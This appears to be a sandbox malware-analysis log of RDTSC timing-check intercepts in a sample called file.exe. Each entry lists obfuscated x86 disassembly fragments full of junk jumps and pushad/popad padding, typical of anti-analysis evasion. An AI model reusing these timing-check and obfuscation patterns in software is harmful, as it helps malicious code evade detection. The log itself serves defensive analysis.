Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C034E second address: 52C03FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c mov di, cx 0x0000000f mov di, ax 0x00000012 popad 0x00000013 jmp 00007F8481503874h 0x00000018 popad 0x00000019 push eax 0x0000001a pushad 0x0000001b mov bx, 9254h 0x0000001f pushfd 0x00000020 jmp 00007F848150386Dh 0x00000025 add eax, 156A5516h 0x0000002b jmp 00007F8481503871h 0x00000030 popfd 0x00000031 popad 0x00000032 xchg eax, ebp 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007F848150386Ch 0x0000003a or al, 00000038h 0x0000003d jmp 00007F848150386Bh 0x00000042 popfd 0x00000043 call 00007F8481503878h 0x00000048 push eax 0x00000049 pop edi 0x0000004a pop esi 0x0000004b popad 0x0000004c mov ebp, esp 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F8481503878h 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C03FE second address: 52C0404 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0404 second address: 52C0408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53005AF second address: 53005B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53005B5 second address: 53005D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007F848150386Ah 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 mov dl, ah 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53005D0 second address: 53005D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53005D4 second address: 5300613 instructions: 0x00000000 rdtsc 0x00000002 movsx edx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F848150386Ch 0x00000010 sbb si, D808h 0x00000015 jmp 00007F848150386Bh 0x0000001a popfd 0x0000001b mov si, DE7Fh 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F848150386Ch 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300613 second address: 5300622 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848074392Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300622 second address: 5300628 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300628 second address: 530062C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E02B0 second address: 52E02B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E02B4 second address: 52E02D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743939h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E02D1 second address: 52E0325 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8481503871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F8481503877h 0x00000010 movzx ecx, bx 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 jmp 00007F848150386Bh 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F8481503870h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E0325 second address: 52E0329 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E0329 second address: 52E032F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E032F second address: 52E0340 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F848074392Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52D0E28 second address: 52D0E2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E012F second address: 52E0135 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E0135 second address: 52E014F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E014F second address: 52E0153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E0153 second address: 52E0159 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E0159 second address: 52E015F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E015F second address: 52E0163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E0163 second address: 52E0187 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743937h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E0187 second address: 52E018B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E018B second address: 52E0191 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E0191 second address: 52E01AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8481503879h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E01AE second address: 52E01BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E01BE second address: 52E01C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E01C2 second address: 52E01D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743932h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E01D8 second address: 52E01F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b push esi 0x0000000c mov ebx, 16295D16h 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52F0D32 second address: 52F0D38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52F0D38 second address: 52F0D5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F848150386Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52F0D5B second address: 52F0D61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52F0D61 second address: 52F0D72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F848150386Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52F0D72 second address: 52F0DCE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743931h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F848074392Eh 0x00000012 xchg eax, ecx 0x00000013 jmp 00007F8480743930h 0x00000018 push eax 0x00000019 jmp 00007F848074392Bh 0x0000001e xchg eax, ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F8480743935h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52F0DCE second address: 52F0DEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8481503871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [76FA65FCh] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52F0DEE second address: 52F0DF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52F0DF4 second address: 52F0DFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52F0DFA second address: 52F0DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52F0DFE second address: 52F0E24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d pushad 0x0000000e push ebx 0x0000000f push eax 0x00000010 pop edi 0x00000011 pop esi 0x00000012 popad 0x00000013 je 00007F84F31363B4h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52F0E24 second address: 52F0E28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52F0E28 second address: 52F0E2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52F0E2E second address: 52F0E44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8480743932h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52F0E44 second address: 52F0E95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov si, di 0x00000013 pushfd 0x00000014 jmp 00007F8481503877h 0x00000019 sub cx, 00EEh 0x0000001e jmp 00007F8481503879h 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52F0E95 second address: 52F0EEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8480743937h 0x00000009 xor cx, 26FEh 0x0000000e jmp 00007F8480743939h 0x00000013 popfd 0x00000014 push eax 0x00000015 pop edx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xor eax, dword ptr [ebp+08h] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F8480743936h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52F0EEF second address: 52F0F70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 mov edi, ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and ecx, 1Fh 0x0000000e jmp 00007F8481503874h 0x00000013 ror eax, cl 0x00000015 pushad 0x00000016 movzx eax, bx 0x00000019 pushfd 0x0000001a jmp 00007F8481503873h 0x0000001f and eax, 70D1A3CEh 0x00000025 jmp 00007F8481503879h 0x0000002a popfd 0x0000002b popad 0x0000002c leave 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007F848150386Ch 0x00000034 or ecx, 0DB50448h 0x0000003a jmp 00007F848150386Bh 0x0000003f popfd 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52F0F70 second address: 5300037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, cx 0x00000007 popad 0x00000008 popad 0x00000009 retn 0004h 0x0000000c nop 0x0000000d mov esi, eax 0x0000000f lea eax, dword ptr [ebp-08h] 0x00000012 xor esi, dword ptr [00722014h] 0x00000018 push eax 0x00000019 push eax 0x0000001a push eax 0x0000001b lea eax, dword ptr [ebp-10h] 0x0000001e push eax 0x0000001f call 00007F84853547E2h 0x00000024 push FFFFFFFEh 0x00000026 pushad 0x00000027 mov edi, ecx 0x00000029 jmp 00007F8480743938h 0x0000002e popad 0x0000002f pop eax 0x00000030 jmp 00007F8480743930h 0x00000035 ret 0x00000036 nop 0x00000037 push eax 0x00000038 call 00007F848536385Fh 0x0000003d mov edi, edi 0x0000003f jmp 00007F8480743930h 0x00000044 xchg eax, ebp 0x00000045 jmp 00007F8480743930h 0x0000004a push eax 0x0000004b jmp 00007F848074392Bh 0x00000050 xchg eax, ebp 0x00000051 pushad 0x00000052 push eax 0x00000053 push edx 0x00000054 mov si, 16F1h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300037 second address: 5300071 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ax, 53F3h 0x0000000a popad 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushfd 0x00000011 jmp 00007F8481503871h 0x00000016 sbb ecx, 07740436h 0x0000001c jmp 00007F8481503871h 0x00000021 popfd 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300071 second address: 53000AE instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8480743930h 0x00000008 adc al, 00000058h 0x0000000b jmp 00007F848074392Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F8480743935h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B000A second address: 52B0032 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8481503877h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0032 second address: 52B009C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 movsx ebx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F8480743933h 0x00000013 xor ax, 790Eh 0x00000018 jmp 00007F8480743939h 0x0000001d popfd 0x0000001e mov di, cx 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 jmp 00007F848074392Ah 0x00000028 mov ebp, esp 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F8480743937h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B009C second address: 52B00B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8481503874h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B00B4 second address: 52B00F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848074392Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and esp, FFFFFFF8h 0x0000000e pushad 0x0000000f mov al, AEh 0x00000011 push edx 0x00000012 mov dl, ah 0x00000014 pop edi 0x00000015 popad 0x00000016 xchg eax, ecx 0x00000017 pushad 0x00000018 mov cx, 9651h 0x0000001c mov cx, 468Dh 0x00000020 popad 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F8480743936h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B00F4 second address: 52B00FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B00FA second address: 52B0116 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848074392Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov esi, 23734AD9h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0116 second address: 52B0167 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8481503876h 0x00000008 sub cl, 00000068h 0x0000000b jmp 00007F848150386Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov di, si 0x00000016 popad 0x00000017 xchg eax, ebx 0x00000018 pushad 0x00000019 push ebx 0x0000001a mov ch, F3h 0x0000001c pop ebx 0x0000001d popad 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F8481503877h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0167 second address: 52B016D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B016D second address: 52B0173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0173 second address: 52B0177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0177 second address: 52B017B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B017B second address: 52B019F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8480743939h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B019F second address: 52B01A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B01A5 second address: 52B01A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B01A9 second address: 52B01BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B01BA second address: 52B01BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B01BE second address: 52B01C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B01C2 second address: 52B01C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B01C8 second address: 52B01CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B01CE second address: 52B01D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B01D2 second address: 52B0209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a mov edx, esi 0x0000000c mov dx, si 0x0000000f popad 0x00000010 mov dword ptr [esp], esi 0x00000013 pushad 0x00000014 movzx ecx, di 0x00000017 jmp 00007F848150386Dh 0x0000001c popad 0x0000001d mov esi, dword ptr [ebp+08h] 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F848150386Dh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0209 second address: 52B026A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8480743937h 0x00000009 add eax, 66CC223Eh 0x0000000f jmp 00007F8480743939h 0x00000014 popfd 0x00000015 mov esi, 36AD4987h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, edi 0x0000001e jmp 00007F848074392Ah 0x00000023 push eax 0x00000024 jmp 00007F848074392Bh 0x00000029 xchg eax, edi 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B026A second address: 52B026E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B026E second address: 52B0274 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0274 second address: 52B02C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, bx 0x00000006 mov ax, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c test esi, esi 0x0000000e pushad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 jmp 00007F8481503874h 0x00000018 popad 0x00000019 je 00007F84F3171BDFh 0x0000001f jmp 00007F8481503870h 0x00000024 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F848150386Ah 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B02C7 second address: 52B02CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B02CD second address: 52B0329 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F84F3171BB2h 0x0000000f pushad 0x00000010 pushad 0x00000011 mov cx, C6A3h 0x00000015 mov edx, eax 0x00000017 popad 0x00000018 call 00007F8481503874h 0x0000001d pushad 0x0000001e popad 0x0000001f pop esi 0x00000020 popad 0x00000021 mov edx, dword ptr [esi+44h] 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 jmp 00007F8481503878h 0x0000002c mov ax, E0E1h 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0329 second address: 52B034D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743937h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B034D second address: 52B0351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0351 second address: 52B0357 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0357 second address: 52B03BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F8481503878h 0x00000008 pop ecx 0x00000009 movsx ebx, si 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f test edx, 61000000h 0x00000015 jmp 00007F848150386Ah 0x0000001a jne 00007F84F3171B65h 0x00000020 jmp 00007F8481503870h 0x00000025 test byte ptr [esi+48h], 00000001h 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F8481503877h 0x00000030 rdtsc
